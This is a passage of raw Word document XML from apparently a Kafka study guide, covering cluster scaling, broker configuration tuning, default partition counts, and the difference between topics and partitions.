          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) can help scale up production throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C3F3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21515A2D"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Optimize producer configurations for high throughput and low latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD313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Distribute load by having multiple producers send messages to different partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456B0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Use Kafka Connect for Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB17EF8"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Kafka Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a framework to scale </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Connect has the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>worker nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can be scaled horizontally to increase the number of connectors handling the data flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF0A15"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Tune Kafka's Configuration for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2BB7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segment.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adjust the segment size of Kafka logs for faster I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28847428"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retention.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set a retention policy based on time to manage disk usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68D94D"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replica.fetchers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase the number of fetchers for replica synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6556B5"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network.threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase network threads to handle more network requests simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC41C9"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io.threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase I/O threads for better disk throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834824E"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zookeeper.session.timeout.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tune for a larger cluster to handle coordination between brokers and Zookeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177AC59"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Replication Factor &amp; Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771BAD2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Ensure that each topic has an appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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llows you to configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Use Partition Rebalancing Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60EB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As the number of brokers and partitions grows, partition distribution can become uneven. Kafka provides tools to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partitions across brokers to ensure that the load is distributed effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025CC2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Reassignment Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to rebalance partitions across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516C9C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164741D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Generate a reassignment plan using the tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6A575"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pply the reassignment plan to ensure partitions are evenly distributed across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6621A" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95"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3308" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E6F29"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Scaling Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B716E"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Monitor Cluster Health:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Avoid Too Many Partitions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Kafka Zookeeper Optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Dedicated Hardware or Cloud Setup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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1828CA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If you want m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20561AD8" w14:textId="62800981" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00866091">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="72592F7F">
          <v:rect id="_x0000_i3309" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD6B5B" w14:textId="5073BA9A" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C966F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="818" w:name="_Toc197868032"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the default partitions in kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="818"/>
    </w:p>
    <w:p w14:paraId="47499B4E" w14:textId="63D12714" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081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Apache Kafka, the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for a topic is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, unless specified otherwise when creating the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD7CB63"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Behavior in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA27CD2"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you create a new topic without explicitly specifying the number of partitions, Kafka will create it with a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set by the broker's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B2E7A"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This default value is controlled by the broker configuration setting </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52BBE9"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Configuration Parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFBF53" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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D145FF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To check or set the default number of partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911A73D"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heck Current Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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6EDAE7C2"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5EF9E46D"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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD199E"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Set the Default Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can change this value to any desired number of partitions. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C8B1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42C05F7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1A88E1"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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02123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After modifying this property, restart the Kafka broker for the changes to take effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8229E3"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reate a Topic with Specific Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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6541CE59"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289624A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kafka-topics.sh --create --topic my-topic --partitions 5 --replication-factor 1 --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23098306"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Why Partitions Matter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF43AE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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15445AAA" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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Key Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72122EB7"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Increasing partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Pr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0018081D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4B2731EA">
          <v:rect id="_x0000_i3310" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC90A76" w14:textId="3F56D728" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="0077669C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="819" w:name="_Toc197868033"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between topic and partition in Kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="819"/>
    </w:p>
    <w:p w14:paraId="31B53F71" w14:textId="1853A89E" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC"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are fundamental concepts that help in organizing and managing data. Here's a detailed breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between a topic and a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FABD1"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Topic in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F3BA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multi-produce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ulti-consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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named entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka and serve as a logical grouping for messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB442D"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Partition in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674F631"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subdivision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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low Kafka to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distribute data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across multiple brokers in a Kafka cluster and enable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by consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04D687"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ensures that each partition is an ordered, immutable sequence of records, and each record within a partition is assigned a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6DE58"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can reside on different Kafka brokers in the cluster, enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACC5FC"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partition also allows Kafka to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distribute work</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> among consumers. Each consumer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CE4B95" w14:paraId="607C8947" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7114B8FB"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3096880"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Topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AFABEF4"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="5E041740" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24AB658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efinition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E63964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a physical subdivision of a topic where data is distributed for scalability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="1B1568DD" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DFCECE8"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ata Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B19676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where data for a topic is physically stored. Data is divided into partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="39F9E0B0" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F64AA1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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DE435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horizontal scalability by distributing data across multiple brokers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="071E1003" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422D923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Ordering Guarantees</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="694EE606"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Data in each partition is strictly ordered. The order of messages in different partitions is not guaranteed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="7F72FA7E" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2758F2E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torage Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6B10B0"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are distributed across multiple brokers in the Kafka cluster.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="0862C0B9" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7900B8FE"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arallelism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC5E6F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parallelism, with each consumer in a group reading from different partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="69331BFA" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F883BD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Consumers within a consumer group can consume data from different partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="7EC44B4D" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C5231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roducer Write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE0A21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partitions based on partitioning logic (e.g., round-robin or key-based).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="0C5FAB09" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B89B984"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Number of Instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9ED03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How Kafka Works with Topics and Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739022B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B918393"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roducers publish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Each message is assigned to a partition based on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871933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is provided with the message, Kafka uses the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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB8410"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and read from it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Each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can have multiple consumers, with each consumer reading from different partitions.</w:t>
      </w:r>
    </w:p>
